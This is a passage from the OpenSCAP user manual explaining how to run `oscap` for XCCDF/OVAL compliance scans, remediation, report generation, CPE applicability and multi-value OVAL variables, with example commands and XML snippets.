files\nindividually using a text editor. Keep in mind that this is only an example\nand filenames depend on contents of the DataStream you are splitting and that\nyou can also inspect XCCDF and OVAL content directly in Source DataStream\nor Result DataStream.\n\n==== XCCDF\nWhen evaluating an XCCDF benchmark, `oscap` usually processes an XCCDF\nfile, an OVAL file and the CPE dictionary. It performs system\nanalysis and produces XCCDF results based on this analysis. The results\nof the scan do not have to be saved in a separate file but can be\nattached to the XCCDF file. The evaluation result of each XCCDF rule\nwithin an XCCDF checklist is printed to standard output stream. The CVE\nand CCE identifiers associated with the rules are printed as well. The\nfollowing is a sample output for a single XCCDF rule:\n\n----\nTitle Verify permissions on 'group' file\nRule usgcb-rhel5desktop-rule-2.2.3.1.j\nIdent CCE-3967-7\nResult pass\n----\n\nThe meaning of results is defined by https:\/\/csrc.nist.gov\/CSRC\/media\/Publications\/nistir\/7275\/rev-4\/final\/documents\/nistir-7275r4_updated-march-2012_clean.pdf[XCCDF Specification].\nThis table lists the possible results of a single rule:\n\n.XCCDF results\n|===\n|Result |Description |Example Situation\n\n|pass\n|The target system or system component satisfied all the conditions of the rule.\n|\n\n|fail\n|The target system or system component did not satisfy all the conditions of the rule.\n|\n\n|error\n|The checking engine could not complete the evaluation, therefore the status of the target\u2019s compliance with the rule is not certain.\n|OpenSCAP was run with insufficient privileges and could not gather all of the necessary information.\n\n|unknown\n|The testing tool encountered some problem and the result is unknown.\n|OpenSCAP was unable to interpret the output of the checking engine (the output has no meaning to OpenSCAP).\n\n|notapplicable\n|The rule was not applicable to the target of the test.\n|The rule might have been specific to a different version of the target OS, or it might have been a test against a platform feature that was not installed.\n\n|notchecked\n|The rule was not evaluated by the checking engine. This status is designed for rules that have no <xccdf:check> elements or that correspond to an unsupported checking system. It may also correspond to a status returned by a checking engine if the checking engine does not support the indicated check code.\n|The rule does not reference any OVAL check.\n\n|notselected\n|The rule was not selected in the benchmark. OpenSCAP does not display rules that were not selected.\n|The rule exists in the benchmark, but is not a part of selected profile.\n\n|informational\n|The rule was checked, but the output from the checking engine is simply information for auditors or administrators; it is not a compliance category. This status value is designed for rules whose main purpose is to extract information from the target rather than test the target.\n|\n\n|fixed\n|The rule had failed, but was then fixed by automated remediation.\n|\n|===\n\nThe CPE dictionary is used to determine whether the content is\napplicable on the target platform or not. Any content that is not\napplicable will result in each relevant XCCDF rule being evaluated to\n\"notapplicable\".\n\nThe following examples show the most common scenarios of XCCDF benchmark\nevaluation:\n\n* To evaluate a specific profile in an XCCDF file run this command:\n\n----\n$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\nWhere *scap-xccdf.xml* is the XCCDF document, *Desktop* is the selected\nprofile from the XCCDF document, *xccdf-results.xml* is a file storing\nthe scan results, and *cpe-dictionary.xml* is the CPE dictionary.\n\n* You can additionaly add `--rule` option to the above command to evaluate\na specific rule:\n\n----\n$ oscap xccdf eval --profile Desktop --rule ensure_gpgcheck_globally_activated --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\nWhere *ensure_gpgcheck_globally_activated* is the only rule from the *Desktop*\nprofile which will be evaluated.\n\n==== Source DataStream\nCommonly, all required input files are bundled together in Source DataStream.\nScanning using Source DataStream is also handled by `oscap xccdf eval` command,\nwith some additional parameters available to determine which of the bundled\nbenchmarks should be performed.\n\n* To evaluate a specific XCCDF benchmark that is part of a DataStream\nwithin a SCAP DataStream collection, run the following command:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP DataStream\ncollection, *ds.xml* is the particular DataStream, *xccdf.xml* is ID of\nthe component-ref pointing to the desired XCCDF document, and\n*xccdf-results.xml* is a file containing the scan results.\n\nNOTE: If you omit `--datastream-id` on the command line, the first data\nstream from the collection will be used. If you omit `--xccdf-id`, the\nfirst component from the checklists element will be used. If you omit\nboth, the first DataStream that has a component in the checklists\nelement will be used - the first component in its checklists element\nwill be used.\n\n\n* (Alternative, not recommended) To evaluate a specific XCCDF benchmark\nthat is part of a DataStream within a SCAP DataStream collection run\nthe following command:\n\n--------------------------------------------------------------------------------------\n$ oscap xccdf eval --benchmark-id benchmark_id --results xccdf-results.xml scap-ds.xml\n--------------------------------------------------------------------------------------\n\nWhere *scap-ds.xml* is a file representing the SCAP DataStream\ncollection, *benchmark_id* is a string matching the \"id\" attribute of\nxccdf:Benchmark containing in a component, and *xccdf-results.xml* is a\nfile containing the scan results.\n\n==== Result DataStream (ARF)\n\nIn the examples above we are generating XCCDF result files using the `--results`\ncommand-line argument. You can use `--results-arf` to generate a Result DataStream\n(also called ARF - Asset Reporting Format) XML instead.\n\n--------------------------------------------------------------------------------------\n$ oscap xccdf eval --benchmark-id benchmark_id --results-arf arf-results.xml scap-ds.xml\n--------------------------------------------------------------------------------------\n\n==== Result STIG Viewer\n\nIf you want to import the XCCDF scan results to DISA STIG Viewer but your Rule IDs don't\nmatch the DISA's ones, you can use the `--stig-viewer` command-line argument along with\na special reference in your Rules to generate XCCDF result files that can be imported by\nDISA STIG Viewer.\n\n--------------------------------------------------------------------------------------\n$ oscap xccdf eval --profile stig-rhel7-disa --stig-viewer results-stig.xml ssg-rhel7-ds.xml\n--------------------------------------------------------------------------------------\n\nEach rule in the input XCCDF must contain a reference to its STIG Rule ID, and its \nhref attribute must be exactly `http:\/\/iase.disa.mil\/stigs\/Pages\/stig-viewing-guidance.aspx`.\n\nFor example:\n----\n<Rule id=\"rpm_verify_permissions\">\n ...\n <reference href=\"http:\/\/iase.disa.mil\/stigs\/Pages\/stig-viewing-guidance.aspx\">SV-86473r2_rule<\/reference>\n ...\n<\/Rule>\n----\n\nFor more information on DISA STIG Viewer click link:http:\/\/iase.disa.mil\/stigs\/Pages\/stig-viewing-guidance.aspx[here].\n\n=== Remediate System\nOpenSCAP allows to automatically remediate systems that have been found in a\nnon-compliant state. For system remediation, an XCCDF file with instructions is\nrequired. The _scap-security-guide_ package contains certain remediation\ninstructions.\n\nSystem remediation consists of the following steps:\n\n . `oscap` performs a regular XCCDF evaluation.\n . An assessment of the results is performed by evaluating the OVAL definitions.\n Each rule that has failed is marked as a candidate for remediation.\n . `oscap` searches for an appropriate fix element, resolves it, prepares the\n environment, and executes the fix script.\n . Any output of the fix script is captured by `oscap` and stored within the\n *rule-result* element. The return value of the fix script is stored as well.\n . Whenever `oscap` executes a fix script, it immediately evaluates the OVAL\n definition again (to verify that the fix script has been applied correctly).\n During this second run, if the OVAL evaluation returns success, the result of\n the rule is *fixed*, otherwise it is an *error*.\n . Detailed results of the remediation are stored in an output XCCDF file. It\n contains two *TestResult* elements. The first *TestResult* element represents the\n scan prior to the remediation. The second *TestResult* is derived from the first\n one and contains remediation results.\n\nThere are three modes of operation of `oscap` with regard to remediation:\nonline, offline, and review.\n\n==== Online Remediation\nOnline remediation executes fix elements at the time of scanning. Evaluation and\nremediation are performed as a part of a single command.\n\nTo enable online remediation, use the `--remediate` command-line option. For\nexample, to execute online remediation using the _scap-security-guide_ package,\nrun:\n\n----\n$ oscap xccdf eval --remediate --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\nThe output of this command consists of two sections. The first section shows the\nresult of the scan prior to the remediation, and the second section shows the\nresult of the scan after applying the remediation. The second part can contain\nonly *fixed* and *error* results. The *fixed* result indicates that the scan performed\nafter the remediation passed. The *error* result indicates that even after\napplying the remediation, the evaluation still does not pass.\n\n==== Offline Remediation\nOffline remediation allows you to postpone fix execution. In first step, the\nsystem is only evaluated, and the results are stored in a *TestResult* element in\nan XCCDF file.\n\nIn the second step, `oscap` executes the fix scripts and verifies the result. It\nis safe to store the results into the input file, no data will be lost. During\noffline remediation, a new *TestResult* element is created that is based\non the input one and inherits all the data. The newly created *TestResult*\ndiffers only in the *rule-result* elements that have failed. For those,\nremediation is executed.\n\nTo perform offline remediation using the _scap-security-guide_ package, run:\n\n----\n$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n----\n$ oscap xccdf remediate --results scan-xccdf-results.xml scan-xccdf-results.xml\n----\n\n==== Remediation Review\nThe review mode allows users to store remediation instructions to a file for\nfurther review. The remediation content is not executed during this operation.\nTo generate remediation instructions in the form of a shell script, run:\n\n----\n$ oscap xccdf generate fix \\\n--fix-type bash \\\n--profile xccdf_org.ssgproject.content_profile_rht-ccp \\\n--output my-remediation-script.sh \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\n=== Check Engines\nMost XCCDF content uses the OVAL check engine. This is when OVAL\nDefinitions are being evaluated in order to assess a system. Complete\ninformation of an evaluation is recorded in OVAL Results files, as\ndefined by the OVAL specification. By examining these files it's\npossible check what definitions were used for the evaluation and why the\nresults are as they are. Please note these files are not generated\nunless *--oval-results* is used.\n\nSome content may use alternative check engines, for example the\n{sce_web}[SCE] check engine.\n\nResults of rules with a check that requires a check engine not supported\nby OpenSCAP will be reported as *notchecked*. Check contents are not\nread or interpreted in any way unless the check system is known and\nsupported. Following is an evaluation output of an XCCDF with unknown\ncheck system:\n\n--------------------------------------------------------\n$ oscap xccdf eval sds-datastream.xml\n\nTitle Check group file contents\nRule xccdf_org.example_rule_system_authcontent-group\nResult notchecked\n\nTitle Check password file contents\nRule xccdf_org.example_rule_system_authcontent-passwd\nResult notchecked\n\nTitle Check shadow file contents\nRule xccdf_org.example_rule_system_authcontent-shadow\nResult notchecked\n\n...\n--------------------------------------------------------\n\nNOTE: The *notchecked* result is also reported for rules that have no\ncheck implemented. *notchecked* means that there was no check in that\nparticular rule that could be evaluated.\n\n\n==== CVE, CCE, CPE and other identifiers\nEach XCCDF Rule can have xccdf:ident elements inside. These elements\nallow the content creator to reference various external identifiers like\nCVE, CCE, CPE and others.\n\nWhen scanning, oscap output identifiers of scanned rules regardless of\ntheir results. For example:\n\n------------------------------------------------------------------------\nTitle Ensure Repodata Signature Checking is Not Disabled For Any Repos\nRule rule-2.1.2.3.6.a\nResult pass\n\nTitle Verify user who owns 'shadow' file\nRule rule-2.2.3.1.a\nIdent CCE-3918-0\nResult pass\n\nTitle Verify group who owns 'shadow' file\nRule rule-2.2.3.1.b\nIdent CCE-3988-3\nResult pass\n------------------------------------------------------------------------\n\nAll identifiers (if any) are printed to stdout for each rule. Since\nstandard output doesn't allow for compact identifier metadata to be\ndisplayed, only the identifiers themselves are displayed there.\n\nIdentifiers are also part of the HTML report output. If the identifier\nis a CVE you can click it to display its metadata from the official NVD\ndatabase (requires internet connection). OpenSCAP doesn't provide\nmetadata for other types of identifiers.\n\nAnother place where these identifiers can be found are machine-readable Result Datastream files.\nThis file can be generated during the scan by adding *--results-arf* option.\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n--fetch-remote-resources --results-arf results.xml \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\n----\n\nResult data stream file **results.xml** contains these identifiers in <rule-result>\nelements.\n\n----\n<rule-result\n idref=\"xccdf_org.ssgproject.content_rule_partition_for_tmp\"\n time=\"2017-01-20T14:30:18\" severity=\"low\" weight=\"1.000000\">\n <result>pass<\/result>\n <ident system=\"https:\/\/nvd.nist.gov\/cce\/index.cfm\">CCE-27173-4<\/ident>\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-content-ref name=\"oval:ssg-partition_for_tmp:def:1\" href=\"#oval0\"\/>\n <\/check>\n<\/rule-result>\n----\n\nSince OpenSCAP 1.2.9 you can use the Group-By feature of HTML report\nto get an overview of results based on their identifiers and references.\n\nThe HTML report can also be used to look-up Rules by their identifiers.\nYou can type the identifier (e.g.: CCE-27173-4) in the search box in\nthe HTML report and only rules with this identifier will be shown.\nThis can be used for any type of XCCDF identifier or reference.\nYou can also click on the rule title to show more details and see all\nits identifiers, including the identifier you looked for.\nThis relies heavily on SCAP content quality, if the identifiers are\nnot present in the source content they will not be available in the\nHTML report.\n\nIf you want to map two identifiers -- e.g.: map CCE identifier to\nNIST 800-53 identifier -- you need to look-up the CCE ID in the\nHTML report through the search box using the first identifier. And then,\nby grouping by NIST SP 800-53 ID, you can see all NIST 800-53 IDs\nrelated to the searched CCE ID.\n\n\n==== Bundled CCE data\nOpenSCAP does not provide any static or product bundled CCE data. Thus\nit has no way of displaying the last generated, updated and officially\npublished dates of static or product bundled CCE data because the dates\nare not defined.\n\n==== Scanning with Script Check Engine (SCE)\nThe Script Check Engine (SCE) is an alternative check engine for XCCDF checklist\nevaluation. SCE allows you to call shell scripts out of the XCCDF document.\nThis approach might be suitable for various use cases, mostly when OVAL checks\nare not required. More information about SCE usage is available on this page:\n{sce_web}[Using SCE].\n\nWARNING: SCE is not part of any SCAP specification.\n\n\n== Advanced oscap usage\n\n=== Validating SCAP Content\nBefore you start using a security policy on your systems, you should first\nverify the policy in order to avoid any possible syntax or semantic errors in\nthe policy. The `oscap` tool can be used to validate the security content\nagainst standard SCAP XML schemas. The validation results are printed to the\nstandard error stream (stderr). The general syntax of such a validation command\nis the following:\n\n----\n$ oscap module validate [module_options_and_arguments] file\n----\n\nwhere file is the full path to the file being validated. As a `module` you\ncan use:\n\n * xccdf,\n * oval,\n * cpe or\n * cve.\n\nThe only exception is the data stream module (ds), which uses the sds-validate\noperation instead of validate. So for example, it would be like:\n\n----\n$ oscap ds sds-validate scap-ds.xml\n----\n\nNOTE: Note that all SCAP components within the given data stream are validated\nautomatically and none of the components is specified separately.\n\nYou can also enable extra Schematron-based validation if you validate OVAL\nspecification. This validation method is slower but it provides deeper analysis.\nRun the following command to validate an OVAL document using Schematron:\n\n----\n$ oscap oval validate --schematron oval-file.xml\n----\n\nThe results of validation are printed to standard error stream (stderr).\n\nNOTE: Please note that for the rest of `oscap` functionality, unless you specify\n--skip-valid, validation will automatically occur before files are used.\nTherefore, you do not need to explicitly validate a datastream before\nuse.\n\n\n=== SCAP Content Signing and Signature Verification\nThe `oscap` itself does not do signature verification. It skips over the\nrespective elements. This is due to the fact that there are way too many options\nwhen it comes to keystores and crypto choices. Instead we recommend users to use\n{xmlsec}[xmlsec1] to verify their SCAP content. Safely evaluating signed\ncontent (with signature verification) involves the following steps:\n\n1) Install xmlsec1 and at least one of its crypto engines\n-------------------------------------\n# yum install xmlsec1 xmlsec1-openssl\n-------------------------------------\n\n2) Run `xmlsec1 --verify` on the content:\n\nThis simple example will only show 2 specific cases of verifying the\nsignature, the steps may vary depending on which technique was used to\nsign the datastream.\n\nAssuming the datastream was signed with a private key and we have the\nrespective public key to verify it with:\n\n------------------------------------------------------\n$ xmlsec1 --verify --pubkey-pem pub.key datastream.xml\n------------------------------------------------------\n\nAssuming the datastream was signed with a certificate and we have the\nrespective public part of the certificate to verify it with:\n\n---------------------------------------------------------------\n$ xmlsec1 --verify --pubkey-cert-pem pubcert.key datastream.xml\n---------------------------------------------------------------\n\nThere are countless other options, for more details see: `xmlsec1\n--help-verify`\n\nSuccessful output should look similar to this:\n\n-----------------------------------------------------\n$ xmlsec1 verify --pubkey-pem key.pub datastream.xml\nOK\nSignedInfo References (ok\/all): 1\/1\nManifests References (ok\/all): 0\/0\n-----------------------------------------------------\n\nAnd the exit code must be 0 before proceeding.\n\n3) If the previous steps resulted in successful verification, proceed\nby evaluating the datastream:\n\n---------------------------------\n$ oscap xccdf eval datastream.xml\n---------------------------------\n\nNOTE: If you want to experiment with various crypto engines of xmlsec1, see\n `xmlsec1-config --help`\n\n\n=== Generating Reports and Guides\nAnother useful features of `oscap` is the ability to generate SCAP content in a\nhuman-readable format. It allows you to transform an XML file\ninto HTML or plain-text format. This feature is used to generate security\nguides and checklists, which serve as a source of information, as well as\nguidance for secure system configuration. The results of system scans can also\nbe transformed to well-readable result reports. The general command syntax is\nthe following:\n\n----\noscap module generate sub-module [specific_module\/sub-module_options_and_arguments] file\n----\n\nwhere module is either `xccdf` or `oval`, `sub-module` is a type of\nthe generated document, and file represents an XCCDF or OVAL file. A sub-module\ncan be either `report`, `guide`, `custom` or `fix`. Please see\n `man oscap` for more details.\n\n\n=== Content Transformation\nThe oscap tool is also capable of using the {xslt}[XSLT] (Extensible Stylesheet\nLanguage Transformations) language, which allows transformation of a SCAP\ncontent XML file into another XML, HTML, plain text or {xsl}[XSL] document.\nThis feature is very useful when you need the SCAP document in a\nhuman-readable form. The following commands represent the most common\ncases:\n\n* Creating a guide (see an\nhttps:\/\/static.open-scap.org\/examples\/guide.html[example]):\n--------------------------------------------------------\n$ oscap xccdf generate guide scap-xccdf.xml > guide.html\n--------------------------------------------------------\n\n* Creating a guide with profile checklist (see an\nhttps:\/\/static.open-scap.org\/examples\/guide-checklist.html[example]):\n------------------------------------------------------------------------------------\n$ oscap xccdf generate guide --profile Desktop scap-xccdf.xml > guide-checklist.html\n------------------------------------------------------------------------------------\n\n* Generating the XCCDF scan report (see an\nhttps:\/\/static.open-scap.org\/examples\/report-xccdf.html[example]):\n-------------------------------------------------------------------\n$ oscap xccdf generate report xccdf-results.xml > report-xccdf.html\n-------------------------------------------------------------------\n\n* Generating the OVAL scan report (see an\nhttps:\/\/static.open-scap.org\/examples\/report-oval.html[example]):\n----------------------------------------------------------------\n$ oscap oval generate report oval-results.xml > report-oval.html\n----------------------------------------------------------------\n\n* Generating the XCCDF report with additional information from failed\nOVAL tests (see an\nhttps:\/\/static.open-scap.org\/examples\/report-xccdf-oval.html[example]):\n----\n$ oscap xccdf generate report \\\n--oval-template oval-results.xml xccdf-results.xml > report-xccdf-oval.html\n----\n\n\n=== CPE applicability\nXCCDF rules in the content may target only specific platforms and hold\nno meaning on other platforms. Such an XCCDF rule contains an\n*<xccdf:platform>* element in its body. This element references a CPE\nname or CPE2 platform (defined using **cpe2:platform-specification**)\nthat could be defined in a CPE dictionary file or a CPE language file\nor it can also be embedded directly in the XCCDF document.\n\nAn XCCDF rule can contain multiple *<xccdf:platform>* elements. It is\ndeemed applicable if at least one of the listed platforms is applicable.\nIf an XCCDF rule contains no *<xccdf:platform>* elements it is considered\nalways applicable.\n\nIf the CPE name or CPE2 platform is defined in an external file, use the\n `--cpe` option and `oscap` auto-detects format of the file. The following\ncommand is an example of the XCCDF content evaluation using CPE name\nfrom an external file:\n\n-----------------------------------------------------------------------------------------\n$ oscap xccdf eval --results xccdf-results.xml --cpe external-cpe-file.xml xccdf-file.xml\n-----------------------------------------------------------------------------------------\n\nWhere *xccdf-file.xml* is the XCCDF document, *xccdf-results.xml* is a file\ncontaining the scan results, and *external-cpe-file.xml* is the CPE\ndictionary or a language file.\n\nIf you are evaluating a source data stream, `oscap` automatically\nregisters all CPEs contained within the data stream. No extra steps have\nto be taken. You can also register an additional external CPE file, as\nshown by the command below:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is the\nXCCDF document, *xccdf-results.xml* is a file containing the scan\nresults, and *additional-external-cpe.xml* is the additional CPE\ndictionary or language file.\n\nThe `oscap` tool will use an OVAL file attached to the CPE dictionary to\ndetermine applicability of any CPE name in the dictionary.\n\nApart from the instructions above, no extra steps have to be taken for\ncontent using *cpe:fact-ref* or **cpe2:fact-ref**. See the following\nsections for details on resolving.\n\n==== xccdf:platform applicability resolution\n\nWhen a CPE name or language model platform is referenced via\n*<xccdf:platform>* elements, resolution happens in the following order:\n\n . Look into embedded CPE2 language model if name is found and applicable deem\n it applicable\n . If not found or not applicable, look into external CPE2 language models\n (order of registration)\n . If not found or not applicable, look into embedded CPE dictionary\n . If not found or not applicable, look into external CPE dictionaries (order of\n registration)\n\nIf the CPE name is not found in any of the sources, it is deemed not\napplicable. If it is found in any of the sources but not applicable, we\nlook for it elsewhere.\n\n==== cpe:fact-ref and cpe2:fact-ref resolution\n\nCPE name referenced from within fact-ref is resolved in the following\norder:\n\n. Look into embedded CPE dictionary, if name is found and applicable\ndeem it applicable\n. If not found or not applicable, look into external CPE dictionaries\n(order of registration)\n\n==== Built-in CPE Naming Dictionary\n\nApart from the external CPE Dictionaries, `oscap` comes with an inbuilt\nCPE Dictionary. The built-in CPE Dictionary contains only a few products\n(sub-set of http:\/\/nvd.nist.gov\/cpe.cfm[Official CPE Dictionary]) and it\nis used as a fall-back option when there is no other CPE source found.\n\nThe list of inbuilt CPE names can be found in the output of\n\n-----------------\n$ oscap --version\n-----------------\n\nYou can file a request to include any additional product in the built-in\ndictionary via https:\/\/www.redhat.com\/mailman\/listinfo\/open-scap-list[open-scap\nmailing list] or\nhttps:\/\/bugzilla.redhat.com\/enter_bug.cgi?product=Fedora[bugzilla].\n\n\n=== Notes on the Concept of Multiple OVAL Values\nThis section describes advanced concepts of OVAL Variables and their\nimplementation in `oscap`. The SCAP specification allows for an OVAL\nvariable to have multiple values during a single assessment run. There\nare two variable modes which can be combined:\n\n* Multival -- A variable is assigned with multiple values at the same\ntime. As an example, consider a variable which refers to preferred\npermission of a given file, that may take multiple values like: '600',\n'400'. The evaluation tries to match each (or all) and then outputs a\nsingle OVAL Definition result.\n* Multiset -- A variable is assigned with a different value (or\nmultival) for different evaluations. This is known as a\n*variable_instance*. As an example consider an OVAL definition which\nchecks that a package given by a variable is not installed. For the first\nevaluation of the definition, the variable can be assigned with\n'telnet-server' value, for second time the variable can be assigned with\n'tftp-server' value. Therefore both evaluations may output different\nresults. Thus, the OVAL Results file may contain multiple results for\nthe same definition, these are distinguished by *variable_instance*\nattribute.\n\nThese two concepts are a source of confusion for both the content\nauthors and the result consumers. On one hand, the first concept is well\nsupported by the standard and the OVAL Variable file format. It allows\nmultiple *<value>* elements for each *<variable>* element. On the other\nhand, the second concept is not supported by an OVAL Variable schema\nwhich prevents fully automated evaluation of the multisets (unless you\nuse XCCDF to bridge that gap).\n\nTIP: `oscap` supports both variable modes as described below.\n\n==== Sources of Variable Values\nFirst we need to understand how a single value can be bound to a\nvariable in the OVAL checking engine. There are three ways to do this:\n\n1) OVAL Variables File -- The values of external variables can be\ndefined in an external file. Such a file is called an OVAL Variable File\nand can be recognized by using the following command: `oscap info\nfile.xml`. The OVAL Variables file can be passed to the evaluation by\n `--variables` argument such as:\n----\n$ oscap oval eval \\\n--variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml \\\n--results usgcb-results-oval.xml \\\nusgcb-rhel5desktop-oval.xml\n----\n\n2) XCCDF Bindings -- The values of external variables can be given from\nan XCCDF file. In the XCCDF file within each *<xccdf:check>* element,\nthere might be *<xccdf:check-export>* elements. These elements allow\ntransition of *<xccdf:value>* elements to *<oval:variables>* elements. The\nfollowing command allows users to export variable bindings from XCCDF to\nan OVAL Variables file:\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n\n3) Values within an OVAL Definition File -- Variables' values defined\ndirectly in the OVAL definitions file *<constant_variable>* and\n*<local_variable>* elements.\n\n==== Evaluation of Multiple OVAL Values\nWith `oscap`, there are two possible ways how two or more values can be\nspecified for a variable used by one OVAL definition. The approach you choose\ndepends on what mode you want to use, multival or multiset.\n\nThe `oscap` handles multiple OVAL values seamlessly. Users don't need to do\nanything differently than for a normal scan.\nThe command below demonstrates evaluation of DataStream, which may include\nmultiset, multival, or both concepts combined, or none of them.\n----\n$ oscap xccdf eval --profile my_baseline --results-arf scap-arf.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\n==== Multival\nMultival can pass multiple values to a single OVAL definition\nevaluation. This can be accomplished by all three ways as described in\nprevious section.\n\n1) OVAL Variables file -- This option is straight forward. The file\nformat (XSD schema) allows for multiple *<value>* elements within each\n*<variable>* element.\n\n--------------------------------------------------------------------------------\n<variable id=\"oval:com.example.www:var:1\" datatype=\"string\" comment=\"Unknown\">\n <value>600<\/value>\n <value>400<\/value>\n<\/variable>\n--------------------------------------------------------------------------------\n\n2) XCCDF Bindings -- Use multiple *<xccdf:check-export>* referring to the\nvery same OVAL variable binding with multiple different XCCDF values.\n----\n<check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_com.example.www_value_1\"\n export-name=\"oval:com.example.www:var:1\"\/>\n <check-export value-id=\"xccdf_com.example.www_value_2\"\n export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n<\/check>\n----\n\n3) Values within OVAL Definitions file -- This is similar to using a\nVariables file, there are multiple *<value>* elements allowed within\n*<constant_variable>* or *<local_variable>* elements.\n\n==== Multiset\nMultiset allows for the very same OVAL definition to be evaluated\nmultiple times using different values assigned to the variables for each\nevaluation. In OpenSCAP, this is only possible by option (2) XCCDF\nBindings. The following XCCDF snippet evaluates twice the very same OVAL\nDefinition, each time it binds a different value to the OVAL variable.\n\n-------------------------------------------------------------------------------------------------------\n<Rule id=\"xccdf_moc.elpmaxe.www_rule_1\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n<\/Rule>\n<Rule id=\"xccdf_moc.elpmaxe.www_rule_2\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n<\/Rule>\n-------------------------------------------------------------------------------------------------------\n\nAfter the evaluation, the OVAL results file will contain multiple\nresult-definitions and multiple result-tests and multiple\ncollected-objects. The elements of the same id will be differentiated by\nthe value of the *variable_instance* attribute. Each of the\ndefinitions\/tests\/object might have a different result of evaluation.\nThe following snippet of OVAL results file illustrates output of a\nmultiset evaluation.\n\n----\n<tests>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\"\n check=\"at least one\" result=\"true\" variable_instance=\"1\">\n <tested_item item_id=\"1117551\" result=\"true\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">600<\/tested_variable>\n <\/test>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\"\n check=\"at least one\" result=\"false\" variable_instance=\"2\">\n <tested_item item_id=\"1117551\" result=\"false\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">400<\/tested_variable>\n <\/test>\n<\/tests>\n----\n\n\n\n=== External or remote resources\nSome SCAP content references external resources. For example SCAP Security Guide\nuses external OVAL file to check that the system is up to date and has no known\nsecurity vulnerabilities. However, other content can use external resources for\nother purposes.\n\nWhen you are evaluating SCAP content with external resources the `oscap` tool\nwill warn you:\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\nWARNING: This content points out to the remote resources. Use `--fetch-remote-resources' option to download them.\nWARNING: Skipping https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-RHEL7.xml.bz2 file which is referenced from XCCDF content\n----\n\nBy default the `oscap` tool will not blindly download and execute remote content.\nIf you trust your local content and the remote content it references, you can use\nthe `--fetch-remote-resources` option to automatically download it using the\n`oscap` tool.\n\n----\n$ oscap xccdf eval \\\n--fetch-remote-resources \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\nDownloading: https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-RHEL7.xml.bz2 ... ok\nTitle Ensure \/var\/log Located On Separate Partition\nRule xccdf_org.ssgproject.content_rule_partition_for_var_log\n...\n----\n\n\n=== Evaluating XCCDF rules with multiple checks\n\nNormally, each XCCDF rule references to a single check with a specified name.\nHowever, if `@name` attribute of `xccdf:check-content-ref` of a given rule is omitted,\nmultiple checks can be executed to evaluate the rule.\nThis is common for `security_patches_up_to_date` check.\nBy default, only a single result is produced for an XCCDF rule in such case, and the\nresult is computed from all results of checks in the referenced location.\nIn case user wants to see separate results for each check (one `xccdf:check-result` element\nin results document for each check evaluated), then `multi-check` attribute\nof `xccdf:check` element must be set to *true*.\n\n----\n<Rule\n id=\"xccdf_org.nist-testsuite.content_rule_security_patches_up_to_date\"\n selected=\"false\" weight=\"10.0\">\n <title xml:lang=\"en-US\">Security Patches Up-To-Date<\/title>\n <description xml:lang=\"en-US\">All known security patches have been installed.<\/description>\n <requires idref=\"xccdf_org.nist-testsuite.content_group_CM-6\"\/>\n <requires idref=\"xccdf_org.nist-testsuite.content_group_SI-2\"\/>\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\" multi-check=\"true\">\n <check-content-ref href=\"r1100-scap11-win_rhel-patches.xml\"\/>\n <\/check>\n<\/Rule>\n----\n\nIn XCCDF specification older than 1.2, the `multi-check` element is not defined,\nwhich means that only a single result is always produced.\nTo produce separate results for each check from the content older than XCCDF version 1.2,\nyou need to convert it first into XCCDF 1.2 using the following command:\n\n----\n$ xsltproc --stringparam reverse_DNS com.example.www \/usr\/share\/openscap\/xsl\/xccdf_1.1_to_1.2.xsl xccdf.xml > xccdf-1.2.xml\n----\n\nAnd then patch the content using a text editor, adding 